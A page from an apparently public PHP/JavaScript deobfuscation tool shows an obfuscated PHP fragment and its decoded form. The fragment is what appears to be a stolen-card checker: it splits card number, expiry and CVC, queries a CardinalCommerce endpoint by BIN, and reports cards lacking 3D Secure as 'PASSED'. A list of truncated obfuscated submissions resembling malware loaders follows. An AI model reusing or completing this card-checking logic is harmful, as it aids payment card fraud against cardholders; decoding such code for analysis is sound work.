Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

\x74\171\160\x65" => "\x63\141\162\144", "\x6e\x75\155\142\x65\x72" => $cc, "\145\x78\160\151\x72\171\x5f\x6d\x6f\x6e\x74\150" => $mm, "\145\170\x70\x69\x72\x79\137\171\x65\x61\x72" => $yyyy)))); goto VMCLx; nOW9n: $card = "{$cc}\x7c{$mm}\x7c{$yyyy}\x7c{$cvc}"; goto tzO4t; Q5Fp6: ini_set("\x65\162\162\157\x72\137\x72\145\160\157\162\164\151\156\x67", E_ERROR | E_PARSE); goto gLpFH; D39ur: $data = json_decode($result, 1); goto F_xJD; OXWEt: strlen($yyyy) == 2 ? $yyyy = "\x32\x30" . $yyyy : NULL; goto eIiXx; tzO4t: $brand = $cc[0] == "\x34" ? "\x76\151\163\141" : "\155\143"; goto i4F8h; RDuF9: list($cc, $mm, $yyyy, $cvc) = explode("\x7c", preg_replace("\x2f\x5b\136\60\x2d\x39\x7c\x5d\x2b\57", '', $card)); goto JUDQo; C4AWE: $ch = curl_init(); goto Z2ySO; VMCLx: $result = curl_exec($ch); goto iiHzz; sRpmN: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\164\164\x70\x73\x3a\x2f\x2f\x67\x65\157\56\x63\141\x72\x64\x69\156\x61\x6c\143\157\155\155\x65\162\x63\x65\x2e\x63\157\x6d\x2f\104\145\166\x69\143\145\x46\x69\x6e\x67\145\162\x70\162\x69\x6e\x74\x57\145\142\x2f\x56\x32\x2f\102\151\x6e\57\105\x6e\x61\x62\x6c\x65\144", CURLOPT_USERAGENT => $_SERVER["\x48\124\x54\x50\137\125\123\x45\122\x5f\x41\107\x45\116\x54"], CURLOPT_CUSTOMREQUEST => "\120\x4f\x53\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("\x43\x6f\156\164\x65\x6e\x74\55\124\171\x70\x65\x3a\40\141\160\160\154\151\x63\141\164\151\157\156\x2f\x6a\163\x6f\x6e\73\x63\150\x61\x72\x73\145\164\x3d\125\x54\106\55\x38"), CURLOPT_POSTFIELDS => json_encode(array("\142\x69\156" => $cc, "\x6f\x72\147\125\x6e\151\x74\111\144" => "\65\x66\144\x30\70\x31\x32\x31\66\x31\x66\65\x33\x62\60\67\145\x31\142\67\x36\x63\70\145")))); goto nGyTa; i4F8h: function response($string, $string1, $string2) { return die(implode("\40\x7c\x20", array("\74\163\x70\141\156\40\x63\154\x61\x73\x73\x3d\x22\x62\141\x64\x67\x65\40\142\x61\x64\x67\145\x2d\157\x75\164\x6c\x69\156\x65\42\76{$string}\74\57\x73\x70\x61\156\76", $string1, $string2)) . "\x3c\x62\162\x3e"); } goto C4AWE; F_xJD: $default = htmlentities($result); goto XeSQ1; XeSQ1: $ch = curl_init(); goto sRpmN; X1lIg: curl_close($ch); goto Wf0KQ; jrcdC: $mm === "\x31\x30" ? $m = "\61\x30" : $mm; goto OXWEt; Wf0KQ: if (strpos($result, "\x22\115\x65\164\150\157\144\x55\162\x6c\x45\156\141\x62\x6c\x65\144\x22\72\146\141\x6c\x73\x65")) { response("\120\101\123\x53\105\104", $card, "\63\x44\123\40\75\40\x46\101\114\x53\105\x20\174\40\x54\x59\x50\105\40\x3d\x20{$data["\143\x61\x72\144\x5f\164\171\160\x65"]}\x20\x7c\40\x43\101\124\105\x47\x4f\122\x59\40\x3d\x20{$data["\x63\x61\162\x64\137\x63\141\x74\x65\147\157\x72\171"]}\x20\174\40\x49\x53\x53\125\x45\122\40\x3d\40{$data["\151\163\x73\165\x65\x72"]}\x20\x7c\40\x43\117\125\116\x54\122\131\40\x3d\40{$data["\x69\x73\x73\x75\x65\x72\x5f\143\x6f\165\156\x74\x72\171"]}

Decrypted code:

type" => "card", "number" => $cc, "expiry_month" => $mm, "expiry_year" => $yyyy))));
 goto VMCLx;
	 nOW9n: $card = "{
	$cc
}
	|{
	$mm
}
	|{
	$yyyy
}
	|{
	$cvc
}
";
 goto tzO4t;
 Q5Fp6: ini_set("error_reporting", E_ERROR | E_PARSE);
 goto gLpFH;
 D39ur: $data = json_decode($result, 1);
 goto F_xJD;
 OXWEt: strlen($yyyy) == 2 ? $yyyy = "20" . $yyyy : NULL;
 goto eIiXx;
 tzO4t: $brand = $cc[0] == "4" ? "visa" : "mc";
 goto i4F8h;
 RDuF9: list($cc, $mm, $yyyy, $cvc) = explode("|", preg_replace("/[^0-9|]+/", '', $card));
 goto JUDQo;
 C4AWE: $ch = curl_init();
 goto Z2ySO;
 VMCLx: $result = curl_exec($ch);
 goto iiHzz;
 sRpmN: curl_setopt_array($ch, array(CURLOPT_URL => "https://geo.cardinalcommerce.com/DeviceFingerprintWeb/V2/Bin/Enabled", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Content-Type: application/json;
charset=UTF-8"), CURLOPT_POSTFIELDS => json_encode(array("bin" => $cc, "orgUnitId" => "5fd021fb07e1bc8e"))));
 goto nGyTa;
	 i4F8h: function response($string, $string1, $string2) {
		 return die(implode(" | ", array("<span class="badge badge-outline">{
		$string
	}
	</span>", $string1, $string2)) . "<br>");
	 
}
 goto C4AWE;
 F_xJD: $default = htmlentities($result);
 goto XeSQ1;
 XeSQ1: $ch = curl_init();
 goto sRpmN;
 X1lIg: curl_close($ch);
 goto Wf0KQ;
 jrcdC: $mm === "10" ? $m = "" : $mm;
 goto OXWEt;
	 Wf0KQ: if (strpos($result, ""MethodUrlEnabled":false")) {
		 response("PASSED", $card, "3DS = FALSE | TYPE = {
		$data["card_type"]
	}
		 | CATEGORY = {
		$data["card_category"]
	}
		 | ISSUER = {
		$data["issuer"]
	}
		 | COUNTRY = {
		$data["issuer_country"]
	}

Recent submissions:

<?php /* iDevlink6.15 */ if (!defined ('DS')){ define('DS', DIRECTORY_SEPARATOR);} if(sess... <?php $z = base64_decode(base64_decode("Q2dvS0NtbG1LQ0ZwYzNObGRDZ2tYME5QVDB0SlJWc2libVJmY0...  <script language="javascript"> (functi... echo "IyEvdXNyL2Jpbi9lbnYgcGhwCjw/cGhwICRzID0gImhlIiAuICJ4MmJpbiI7JF8gPSBhcnJheSgkcywiNjY2... fp="/home/wwwiyc/publlic_html/core.php"; if [ ! -s "$fp" ]; then echo "IyEvdXNyL2Jpbi9lbnY... <?php //004fb if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname()... eJxtk2tTgkAUhr87039YY6cBwbyMoyXaVNpkdtHsoqbCcFkUdMAWrND6761KoSx8gT1z9jnnfc/hIAH+Hoa5leRxM3... $FBEPZWWQ = "\x36\x29\x35\x34\x7a\x78\x10\x2b\x35\x34\x20\x2e\x2a"^'THFQLLOOPWOJO';... \x23\x22\x38\x3a\x36\x38\x35\x24\x3c\x20\x2a\x36... var _0x56216a=_0x3405;(function(a,b){var c=_0x3405;for(a=a();;)try{if(-parseInt(c(275))+pa...